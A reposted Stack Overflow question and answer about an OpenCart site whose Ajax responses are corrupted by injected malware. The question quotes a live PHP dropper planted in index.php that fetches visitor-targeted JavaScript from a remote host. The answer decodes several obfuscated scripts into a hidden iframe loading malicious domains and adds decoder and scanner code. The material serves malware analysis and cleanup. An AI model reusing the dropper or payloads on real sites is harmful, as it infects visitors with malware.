
php - Opencart: unknown characters in Ajax JSON response

Reposted. Author: 行者123. Updated: 2023-12-03 12:18:43

I'm working on an e-commerce website. It was working fine, but suddenly all the ajax functions stopped working properly.
When I inspected the ajax code in Firebug, I could see some js string appended to the response:

  {"success":"Success: You have added <a href=\"http:\/\/www.test.com\/exmple\">sample<\/a> to your <a href=\"http:\/\/www.test.com
\/index.php?route=checkout\/cart\">shopping cart<\/a>!","total":"2070
items","amount":"$2,028.60"} <script>e=eval;v="0"+"x";a=0;try{a&=2}catch(q){a=1}if(!a)
{try{document["\x62ody"]^=~1;}catch(q) {a2="_"}z="10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10


I only get this error in Firefox.

This is what they added to the index.php file.

<?php
if (!isset($sRetry))
{
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
            $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
        }
    }
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
        $sResult = @curl_exec($stCurlHandle);
        if ($sResult[0]=="O")
        {
            $sResult[0]=" ";
            echo $sResult; // Statistic code end
        }
        curl_close($stCurlHandle);
    }
}
?>


I just removed the code and now it works fine...

Best answer

Too bad you didn't give us the complete JavaScript that the PHP injects (if you still have the PHP, please add it to your question so we can decode it). But many thanks for sharing the PHP behind it!!!

Removing the php script is indeed the solution, but first one should find out how one got "hacked"/"infected"!


Weak passwords or a fairly new exploit?
Also, the computers of all developers/maintainers/contributors who have (had) (ftp/admin/cms) access to your site must be checked for password-stealing/sniffing malware (picked up from visiting your/another infected site).
Rogue plugins/modules installed on your site/server?
The whole server (and all websites on it) may also be compromised. Contacting the hosting provider might be wise.


Note that such malware is usually picked up by Google: they add a warning to the index entry of such hacked sites: "This site may harm your computer."
To remove that notice you need to use Google Webmaster Tools' "Request a malware-review" (I don't know whether Google automatically rescans your pages after x time if you don't report the page as fixed, nor whether you can report pages as fixed without using google-webmaster tools, so beware if you don't want to give google your mobile phone number!!!)

If the base64 decode in your php code is of the string aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw, then the URL it fetches is: http://mbrowserstats.com/statE/stat.php

Your infected php site uses the above url together with the GET string
?ip=YOUR_IP&useragent=YOUR_BROWSER&domainname=INFECTED_WEBSITE_DOMAIN&fullpath=INFECTED_WEBSITE_PAGE&check='.isset($_GET['look'])
to fetch a custom, unique, on-demand javascript and inserts it into the markup served to the (targeted!!) visitor.

To decode the payload of that inserted visitor-unique javascript I quickly made a decoder (which also works on your partial payload, using the character _ as separator and an offset of -7 on these base 16 numbers).
The (partial) string: 10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10
decodes to:

        if (document.getElementsByTagName('body')[0]){




I'd like to share my analysis of the variant I got, to explain how it works (hopefully useful to others):
A website I visited (in palemoon = firefox) suddenly launched Java and a cmd box popped up.
Cr@p.
"View source" of the document showed an obfuscated script that was "served" (inserted) before the html tag (preceded by whitespace):

 <script>w=window;aq="0"+"x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,17,6e,60,5b,6b,5f,34,1e,28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,27,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32,67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,66,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19,20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,20,32,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28,27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,2
0,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"["split"](",");}w=f;s=[];for(i=2-2;-i+640!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e(aq+(w[j]))+9);}fafa=e;fafa(s)}</script>
<html>
<head>
<title> etcetera...


Running it through jsbeautifier.org cleans it up (before adding my manual analysis comments) to:

w = window; //hmmkay, note: reused later on
aq = "0" + "x"; //so.. '0x', smells like hex
ff = String; //haha, neat, ff is String
ff = ff.fromCharCode; //and ff is now String's fromCharCode method
try {
    document["\x62ody"] ^= ~1; //I'm guessing this should fail
} catch (d21vd12v) { //so all the rest gets executed:
    v = 123; //bliep? 42? Here be dragons.. aka useless
    vzs = false; //ahh, can you guess where this leads?
    try { //no idea why this test is here
        document;
    } catch (q) { //but for an infection this should NOT run
        vzs = 1;
    }
    if (!vzs) e = w["eval"]; //false will become true so e = EVIL
    if (1) { //lol, if true, ok...
        //ahh, f the payload, an array (by split) of
        //640 hex-numbers
f = "0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,17,6e,60,5b,6b,5f,34,1e,28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,27,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32,67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,66,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19,20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,20,32,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28,27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74" ["split"](",");
    }
    w = f; //ahh juggling w to f
    s = []; //preparing s to receive the decoded string
    for (i = 2 - 2; - i + 640 != 0; i += 1) { //haha, ok: ( 2-2=0; lol; i++ )
        j = i; //juggle artist at it again
        if ((031 == 0x19)) if (e) s = s + ff(e(aq + (w[j])) + 9); //9 offset
    } // 31oct = 19hex = 25 = true, if eval, LOOK MA, WITHOUT parseInt being EVIL
    fafa = e; //ok stop juggling. fafa = EVIL
    fafa(s) //there we go: EVIL(decoded string)
}


As you can now read, they jump through a lot of hoops to fool virus scanners.

I refactored it (to my understanding) to:

w = "/*PAYLOAD: comma separated uni-code characters in hex*/" ["split"](",");
s = '';
for (i = 0; i < 640; i++) {
    s += String.fromCharCode( parseInt(w[i],16) + 9 ); //decode
}
eval(s) //execute


Using my decoder (set to base 16, separator character , and offset 9) the payload decodes to:

if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe src='http://rotatethespin.com:8000/lhhqnccqs?ftbhkpmcort=5186751' width='100' height='100' style='width:100px;height:100px;position:absolute;left:-10000px;top:0;'></iframe>");
}
function iframer(){
    var f = document.createElement('iframe');f.setAttribute('src','http://rotatethespin.com:8000/lhhqnccqs?ftbhkpmcort=5186751');f.style.left='-10000px';f.style.top='0';f.style.position='absolute';f.style.top='0';f.setAttribute('width','100');f.setAttribute('height','100');
    document.getElementsByTagName('body')[0].appendChild(f);
}


Note that this generated code was indented with 2 and 3 tabs (amateur, or fooling virus scanners?), which I removed for my own readability. The line endings were also CR (13 dec) (is the author/script kiddie on an older MAC?).

So now we have all the code, which can (finally) be explained simply:


The PHP script curls a visitor/website-unique javascript to inject into the served markup
This (via PHP) injected javascript injects an iframe into the document's body (with the browser's help, since the body does not exist yet), positioned at -10000px to the left of the visited page (out of sight, in the visitor's browser), and
The injected iframe loads a specifically targeted (to the user and the website the user is visiting) external page (containing god knows what kind of mess/malware/viruses/rootkits; in my case from rotatethespin.com:8000, muruno-vaser.info:8000 etc.).


I also verified this by getting the document's live html using this bookmarklet:

javascript:(function(){ alert(document.documentElement.innerHTML); })()


This also showed the injected iframe code in the source.

I used the next bookmarklet to move the iframe into view (assuming there is only 1 iframe):

javascript:(function(){ document.getElementsByTagName('iframe')[0].style.left='0px'; })()


Naturally one can also use Firebug and similar tools (depending on the browser).

I also noticed that when fetching the source of an infected website with most web-based tools (even the w3c validator), the php does not insert the javascript, making the website look uninfected!
I also ran into this "problem" when trying a simple telnet command to (safely) fetch the infected code. But after looking at the php code behind it I realized I had to use some HTTP headers (specifically the referer).
Doing: telnet infected-site.com 80 and then pasting the following finally served the infected markup source:

GET /path.php?page=something HTTP/1.1
Host: infected-site.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-us;q=0.7,en;q=0.3
Referer: http://infected-site.com/index.php
Connection: Close

Note that this way one can also safely explore (and reverse-engineer) the source of the iframe etc!!

I also noticed that the website-owner's computer also did not get the infected code! This is either because his machine is infected or because the server that distributes the javascripts did not provide a script because it knew that client machine was already infected.

Update: having a working set of tools in this answer, I re-checked the compromised website today (after a good night's rest) and got a totally different script injected (but still based on the same techniques I explained in this answer).

<script>ss=eval("Str"+"ing");d=document;a=("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,151,164,163,161,163,170,145,62,147,163,161,63,160,154,170,173,175,175,164,154,154,103,152,151,146,165,175,147,160,147,101,71,65,74,72,73,71,65,53,44,173,155,150,170,154,101,53,65,64,64,53,44,154,151,155,153,154,170,101,53,65,64,64,53,44,167,170,175,160,151,101,53,173,155,150,170,154,76,65,64,64,164,174,77,154,151,155,153,154,170,76,65,64,64,164,174,77,164,163,167,155,170,155,163,162,76,145,146,167,163,160,171,170,151,77,160,151,152,170,76,61,65,64,64,64,64,164,174,77,170,163,164,76,64,77,53,102,100,63,155,152,166,145,161,151,102,46,55,77,21,15,15,201,21,15,15,152,171,162,147,170,155,163,162,44,155,152,166,145,161,151,166,54,55,177,21,15,15,15,172,145,166,44,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,167,166,147,53,60,53,154,170,170,164,76,63,63,151,164,163,161,163,170,145,62,147,163,161,63,160,154,170,173,175,175,164,154,154,103,152,151,146,165,175,147,160,147,101,71,65,74,72,73,71,65,53,55,77,152,62,167,170,175,160,151,62,160,151,152,170,101,53,61,65,64,64,64,64,164,174,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,101,53,145,146,167,163,160,171,170,151,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,173,155,150,170,154,53,60,53,65,64,64,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,
53,154,151,155,153,154,170,53,60,53,65,64,64,53,55,77,21,15,15,15,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,62,145,164,164,151,162,150,107,154,155,160,150,54,152,55,77,21,15,15,201"["split"](","));for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],8)-(7-3);}try{d.body--}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss["fromCharCode"].apply(ss,a));</script>


Note that this time the numbers are octal (base 8) (separated by , with an offset of -4).
So I updated my decoder to include a base/radix setting (and all the relevant links in this answer), and the payload still does the same thing (apart from the domain it points to).



I found this question by googling, which gave (mostly useless/infected) 834 results.

The malware I stumbled upon today contained the above string and, inside it, the very pretty string document["\x62ody"] ^= ~1, which gives 8300 (also mostly useless/infected) results.

But googling '// This code use for global bot statistic' (found in the php provided in the question) gives over 4.1 million results (going back to at least 2010), indicating that WordPress, joomla etc. are also victims of this "technique".

Reading some of those links (like this, this and this), I get the impression it can fool search engines (like google) into boosting page rank. This comes at the cost of opening a malware vulnerability of one's own.
Naturally, the variants dedicated to distributing malware now try to hide themselves from search engines.
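The following is an added example by the editor, not code from the original answer or the answerer's own decoder. It re-implements the decode loop that the three injected scripts above share (split on a separator, parse each token in a radix, add a constant offset, map to a character) and, going one step beyond the answer, brute-forces the radix and offset when they are unknown. The payload fragments are the first tokens of the three scripts quoted above, so it runs offline.

```python
# Payload fragments quoted from the three scripts above (the asker's "_" hex variant,
# the first "," hex variant and the octal variant); none of them is constructed.
PAYLOAD_HEX_UNDERSCORE = ("10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a"
                          "_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10")
PAYLOAD_HEX_COMMA = "0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b"
PAYLOAD_OCTAL = "15,15,155,152,44,54,150,163,147,171,161,151,162,170"


def decode_payload(payload, radix, sep, offset):
    """The dropper's decode loop: split on `sep`, parse each token in `radix`, add `offset`, map to a char."""
    return "".join(chr(int(tok, radix) + offset) for tok in payload.split(sep))


def looks_like_script(text):
    """True when the text is printable ASCII (plus tab/CR/LF) and names a DOM API the dropper needs."""
    if not all(c in "\t\r\n" or 32 <= ord(c) < 127 for c in text):
        return False
    return any(kw in text for kw in ("document", "iframe", "eval"))


def guess_params(payload, radices=(8, 10, 16), offsets=range(-16, 17)):
    """Brute-forces radix and offset (the separator is read off the payload) until the output reads as JS."""
    sep = "_" if "_" in payload else ","
    for radix in radices:
        for offset in offsets:
            try:
                text = decode_payload(payload, radix, sep, offset)
            except ValueError:  # token invalid in this radix ("6d" as octal) or chr() of a negative value
                continue
            if looks_like_script(text):
                return radix, sep, offset
    return None


if __name__ == "__main__":
    for name, payload in (("asker", PAYLOAD_HEX_UNDERSCORE), ("hex", PAYLOAD_HEX_COMMA), ("octal", PAYLOAD_OCTAL)):
        params = guess_params(payload)
        print(name, params, repr(decode_payload(payload, *params)))
```

All three fragments decode to the same opening line, `if (document.getElementsByTagName('body')[0]){`, which is the quickest way to confirm a new sample is just another re-encoding of the same dropper.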

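A second added example (the editor's code, not the answerer's): the indicators this answer walks through, a base64-encoded http:// URL fed to curl_init, the bot user-agent filter, a `<script>` served before `<html>`, the `document["\x62ody"]^=~1` probe, a split/fromCharCode decode loop and an iframe parked at left:-10000px, turned into a small scanner for PHP sources and for served or live HTML. The samples are constructed, with example.invalid as a placeholder callback host; `fetch_as_browser` is an assumed helper that sends the User-Agent and Referer headers the telnet session above needed, and is not exercised offline.

```python
import re
import urllib.request

# Indicators drawn from the infected index.php and the injected <script> discussed above.
PHP_INDICATORS = {
    "base64_http_url": re.compile(r"base64_decode\(\s*['\"]aHR0cDov"),  # "aHR0cDov" is base64 of "http://"
    "bot_ua_filter": re.compile(r"HTTP_USER_AGENT[\s\S]*?strstr\(\$\w+,\s*'(?:google|bot|bing)'"),
    "echo_curl_result": re.compile(r"curl_exec\([\s\S]*?echo\s+\$\w+"),  # remote reply echoed into the page
}
HTML_INDICATORS = {
    "script_before_html": re.compile(r"\A\s*<script>.*?</script>\s*<html", re.S | re.I),
    "body_probe": re.compile(r'document\["\\x62ody"\]\s*\^=\s*~1'),  # the try/catch anti-analysis trick
    "split_fromcharcode": re.compile(r'\["split"\]\(.*fromCharCode', re.S),
    "offscreen_iframe": re.compile(r"<iframe[^>]*left:\s*-\d{3,}px", re.I),
}


def scan(text, indicators):
    """Returns the sorted names of every indicator that matches `text`."""
    return sorted(name for name, rx in indicators.items() if rx.search(text))


def fetch_as_browser(url, timeout=10):
    """Fetches a page with the browser-style headers the answer found necessary and returns its HTML."""
    req = urllib.request.Request(url, headers={
        "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
        "Referer": url, "Accept": "text/html"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed samples (not from the page): a cut-down copy of the dropper's shape with a placeholder
# callback URL, an injected pre-<html> script, and the DOM as a bookmarklet would show it afterwards.
PHP_SAMPLE = r"""<?php
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
if ((strstr($sUserAgent, 'google') == false) && (strstr($sUserAgent, 'bot') == false)) {
    $stCurlLink = base64_decode('aHR0cDovL2V4YW1wbGUuaW52YWxpZC9zdGF0LnBocA==') . '?ip=' . urlencode($_SERVER['REMOTE_ADDR']);
    $h = curl_init($stCurlLink); curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($h); echo $sResult;
}
?>"""
INJECTED_HTML = (' <script>e=eval;try{document["\\x62ody"]^=~1;}catch(q){f="0,0,60"["split"](",");'
                 's=String.fromCharCode(parseInt(f[2],16)+9);e(s);}</script>\n<html><head></head></html>')
RENDERED_HTML = ('<html><body><iframe src="http://example.invalid/x" style="position:absolute;'
                 'left:-10000px;top:0;width:100px;height:100px;"></iframe></body></html>')
CLEAN_HTML = "<html><head><title>shop</title></head><body>hello</body></html>"

if __name__ == "__main__":
    print(scan(PHP_SAMPLE, PHP_INDICATORS))
    print(scan(INJECTED_HTML, HTML_INDICATORS), scan(RENDERED_HTML, HTML_INDICATORS), scan(CLEAN_HTML, HTML_INDICATORS))
```

Run `scan` over every .php file in the webroot and over `fetch_as_browser(your_page)` rather than over a curl or validator fetch, since, as the answer notes, the dropper stays silent for bot-like clients and for requests without a Referer.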
Regarding php - Opencart: unknown characters in Ajax JSON response, we found a similar question on Stack Overflow: https://stackoverflow.com/questions/16264707/
